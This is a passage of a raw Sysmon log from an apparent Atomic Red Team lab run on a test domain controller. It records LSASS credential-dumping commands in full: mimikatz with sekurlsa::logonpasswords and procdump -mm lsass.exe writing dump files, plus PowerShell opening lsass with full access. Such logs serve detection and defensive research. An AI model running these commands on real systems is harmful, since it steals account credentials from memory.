.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.057{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %%tmp%%\lsass.DMP" "sekurlsa::logonpasswords full" exit" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=054F298A7BEB1555866A54A62CCEDB11,SHA256=63DF5104025B5552E91175E7C45E4CBC1575AC509D3116712A0E730FF8B64109,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000025716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.093{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000025715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.234{4DB9351A-A341-60D3-5E06-00000000CF01}63161948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c913ea7(wow64)|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+6913|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+6818|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+c76b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+c7b25|C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\66e6de50ffc98a394cc7addf10a394da\mscorlib.ni.dll+59d884|C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\66e6de50ffc98a394cc7addf10a394da\mscorlib.ni.dll+5b51f2|UNKNOWN(00007FFF5B134B64) 11241100x800000000000000025714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.218{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lsass_628.dmp2021-06-23 21:10:26.218 10341000x800000000000000025713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.218{4DB9351A-A341-60D3-5E06-00000000CF01}63161948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B133C46) 23542300x800000000000000025712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.202{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E13601E4592CDBB90940EA9AA4FB7D35,SHA256=2B8213C134F729E55BAA7B4ED724B41F7947DFFB74AF46DCE668FD2818D2325C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:26.062{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=332EB56DB4C9BBA5E5316E7F1D617F15,SHA256=9ED03307AC350B8582D9C02FCAD9A0B79B2C102E4279EF80108B5B02C8404579,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.656{4DB9351A-A343-60D3-6106-00000000CF01}65965036C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+126c2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.546{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeC:\Windows\Temp\lsass_dump-1.dmp2021-06-23 21:10:27.546 10341000x800000000000000025762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.546{4DB9351A-A343-60D3-6106-00000000CF01}65965736C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000025761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:27.546{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x800000000000000025760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.531{4DB9351A-A343-60D3-6006-00000000CF01}65726100C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000025753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.527{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x800000000000000025752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:27.515{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe2021-06-23 21:10:19.343 10341000x800000000000000025751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.515{4DB9351A-A343-60D3-6006-00000000CF01}65726100C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 13241300x800000000000000025750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:27.499{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x800000000000000025749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.499{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-A343-60D3-5F06-00000000CF01}53601684C:\Windows\system32\cmd.exe{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.494{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp" 10341000x800000000000000025741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 